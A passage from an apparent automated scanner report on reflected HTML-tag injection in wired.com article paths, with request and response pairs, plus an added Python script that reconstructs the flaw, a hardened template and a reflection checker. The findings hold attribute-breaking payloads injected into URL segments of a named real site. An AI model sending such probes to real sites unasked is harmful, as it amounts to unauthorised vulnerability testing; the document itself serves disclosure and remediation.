...[SNIP]...
<body class="s_science ss_discoveries c_news91895"><a>1c7fed98e1a">
...[SNIP]...

1.229. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95176"><a>ea0344b1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science95176"><a>ea0344b1c10/discoveries/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science95176"><a>ea0344b1c10 ss_discoveries c_news">
...[SNIP]...

1.230. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d23ae"><a>0f5c0610fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesd23ae"><a>0f5c0610fda/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesd23ae"><a>0f5c0610fda c_news">
...[SNIP]...

1.231. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30df0"><a>9cafe32651a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news30df0"><a>9cafe32651a/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news30df0"><a>9cafe32651a">
...[SNIP]...

1.232. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5ec"><a>c25249c30fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceca5ec"><a>c25249c30fc/discoveries/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:22 GMT
Date: Sun, 21 Nov 2010 23:10:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceca5ec"><a>c25249c30fc ss_discoveries c_news">
...[SNIP]...

1.233. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0442"><a>9e37c4acab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese0442"><a>9e37c4acab2/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:43 GMT
Date: Sun, 21 Nov 2010 23:10:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese0442"><a>9e37c4acab2 c_news">
...[SNIP]...

1.234. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13aa"><a>0ad5cf6d60a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsd13aa"><a>0ad5cf6d60a/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:01 GMT
Date: Sun, 21 Nov 2010 23:11:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsd13aa"><a>0ad5cf6d60a">
...[SNIP]...

1.235. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9582"><a>bcb764a9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee9582"><a>bcb764a9769/discoveries/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:29 GMT
Date: Sun, 21 Nov 2010 23:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee9582"><a>bcb764a9769 ss_discoveries c_news">
...[SNIP]...

1.236. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10800"><a>1d3b957fa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries10800"><a>1d3b957fa67/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries10800"><a>1d3b957fa67 c_news">
...[SNIP]...

1.237. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 187f0"><a>98dbdd44018 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news187f0"><a>98dbdd44018/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:04 GMT
Date: Sun, 21 Nov 2010 23:11:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news187f0"><a>98dbdd44018">
...[SNIP]...

1.238. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49504"><a>10544948792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science49504"><a>10544948792/discoveries/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science49504"><a>10544948792 ss_discoveries c_news">
...[SNIP]...

1.239. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86976"><a>98f964069b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries86976"><a>98f964069b0/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries86976"><a>98f964069b0 c_news">
...[SNIP]...

1.240. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5931b"><a>18d340cf7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news5931b"><a>18d340cf7a3/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3">
...[SNIP]...
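The eighteen findings in this part of the report are all the same defect seen from three path positions: whichever segment is mutated, the server pastes it straight into the class attribute of the body element on its 404 page, so a payload containing `">` closes the attribute and opens a new tag. The script below is an added example, not code from the scanner report or from wired.com. It reconstructs the observed behaviour with a hypothetical template (`build_body_class`, an assumption about how the page is rendered, chosen only because it reproduces the response line in finding 1.240 byte for byte), puts a hardened template beside it, and includes the check a tester would run by hand on the captured response: does the canary come back raw, encoded, or not at all, and if raw, does its quote actually land inside a double-quoted attribute? The base path, payload and response fragment are copied from finding 1.240; `inject_segment` mimics the scanner's mutation (append the payload to the chosen segment) as seen in the request lines.

```python
import html
import re

# Sample data copied from finding 1.240 above.
BASE_PATH = "/science/discoveries/news/2007/06/dayintech_0629"
PAYLOAD = '5931b"><a>18d340cf7a3'
# The only part of the 404 body the report shows for that finding.
OBSERVED_BODY_TAG = '<body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3">'


def inject_segment(path: str, param_index: int, payload: str) -> str:
    """Append `payload` to the 1-based "REST URL parameter" (path segment),
    the same mutation the scanner applied to build the request lines above."""
    segments = path.strip("/").split("/")
    segments[param_index - 1] += payload
    return "/" + "/".join(segments)


def build_body_class(path: str) -> str:
    """Hypothetical reconstruction (an assumption, not the site's code) of the
    vulnerable template: the first three path segments are concatenated
    verbatim into the body element's class attribute."""
    segments = (path.strip("/").split("/") + ["", "", ""])[:3]
    return '<body class="s_%s ss_%s c_%s">' % tuple(segments)


# Allowlist for a section/subsection/type slug; anything else is not a slug.
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def build_body_class_safe(path: str, allowlist: bool = True) -> str:
    """Hardened template: optionally allowlist each segment, and always apply
    attribute-context HTML encoding to whatever is finally emitted."""
    segments = (path.strip("/").split("/") + ["", "", ""])[:3]
    if allowlist:
        segments = [s if SEGMENT_RE.match(s) else "unknown" for s in segments]
    encoded = tuple(html.escape(s, quote=True) for s in segments)
    return '<body class="s_%s ss_%s c_%s">' % encoded


def classify_reflection(body: str, payload: str) -> str:
    """Classify how `payload` is reflected in `body`.

    Returns one of:
      'absent'               payload not present in any form
      'escaped'              only the HTML-encoded form is present (safe)
      'raw-outside-attribute' raw payload present, but not inside a
                             double-quoted attribute value
      'raw-in-attribute'     raw payload inside a quoted value, but it carries
                             no quote of its own, so it cannot break out
      'raw-breaks-attribute' raw payload inside a quoted value and it contains
                             a double quote: the tag-injection condition the
                             report describes
    The quote-counting is a heuristic that is adequate for a single tag
    fragment such as the <body ...> line the scanner shows.
    """
    idx = body.find(payload)
    if idx == -1:
        return "escaped" if html.escape(payload, quote=True) in body else "absent"
    tag_start = body.rfind("<", 0, idx)
    if tag_start == -1:
        return "raw-outside-attribute"
    before = body[tag_start:idx]
    # An odd number of double quotes between the tag's '<' and the payload
    # means the payload landed inside a double-quoted attribute value.
    if before.count('"') % 2 == 0:
        return "raw-outside-attribute"
    return "raw-breaks-attribute" if '"' in payload else "raw-in-attribute"


def assess(param_index: int, payload: str = PAYLOAD, base_path: str = BASE_PATH) -> dict:
    """Run one scanner-style check for a given path position against the
    vulnerable template and both hardened variants, returning the verdicts."""
    mutated = inject_segment(base_path, param_index, payload)
    return {
        "request_path": mutated,
        "vulnerable": classify_reflection(build_body_class(mutated), payload),
        "encoded_only": classify_reflection(
            build_body_class_safe(mutated, allowlist=False), payload),
        "allowlisted": classify_reflection(
            build_body_class_safe(mutated, allowlist=True), payload),
    }


if __name__ == "__main__":
    # The reconstruction must reproduce the response line from finding 1.240.
    assert build_body_class(inject_segment(BASE_PATH, 3, PAYLOAD)) == OBSERVED_BODY_TAG
    for i in (1, 2, 3):
        print(i, assess(i))
```

Two things the report's "manually examine" advice points at and the script makes concrete. First, the request shown sends the quote and angle brackets raw in the path; a current browser percent-encodes those characters in a URL path before sending, so turning this into a link-based attack depends on whether the server decodes `%22`, `%3C` and `%3E` before the value reaches the template, which is a separate check against the live host. Second, the scanner reports each path position as its own finding, but `assess` shows the same template produces all three, so one fix at the point where the class names are built (encode for the attribute context, and preferably allowlist the slug as well) closes every entry in this block.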

1.241. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf82e"><a>db00fe548f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecf82e"><a>db00fe548f1/discoveries/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:05 GMT
Date: Sun, 21 Nov 2010 23:11:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecf82e"><a>db00fe548f1 ss_discoveries c_news">
...[SNIP]...

1.242. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d3a"><a>ccd81216dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

